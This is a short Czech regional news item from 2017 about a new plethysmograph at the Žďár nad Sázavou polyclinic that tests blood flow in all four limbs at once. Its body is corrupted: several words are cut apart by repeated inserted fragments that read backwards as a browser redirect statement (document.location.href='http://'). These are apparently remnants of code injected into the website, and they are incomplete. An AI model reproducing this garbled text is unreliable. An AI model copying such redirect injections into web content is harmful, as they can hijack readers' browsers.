Rainbow page separator

Přístroj vyšetří poruchy cévního systému všech končetin naráz

Čtvrtek, 9. listopadu 2017

Poliklinika Žďár nad Sázavou

Žďár nad Sázavou / Nový pletysmograf mohou využívat pacienti cévního oddělení žďárské polikliniky. Přístroj v rámci průběžné obnovy vybavení zdravotnického zařízení nahradil původní, který měla poliklinika v bezplatné výpůjčce, aby byl umožněn rychlý rozvoj oddělení angiologie bez počátečních investic.
Nový přístroj zakoupený poliklinikou za s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sedmdesát osm tisíc korun slouží k vyšetření prokrvení končetin, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to u žilního i tepenného systému. Patří k nejmodernějším ve své kategorii a dokáže najednou vyšetřit všechny čtyři končetiny, přičemž ten původní vyšetřil pouze dvě. Pletysmograf pacienty hlasově naviguje, co přesně mají při vyšetření dělat, poté au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomaticky vyhodnotí tepovou a žilní křivku a nabídne lékaři předběžný závěr, který může vést ke stanovení dalšího vyšetřovacího postupu. Důleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou úlohu přístroj hraje rovněž při preventivních vyšetřeních, kdy odhalí různé poruchy cévního systému končetin ještě dříve, než pacient začne pociťovat zdravotní potíže.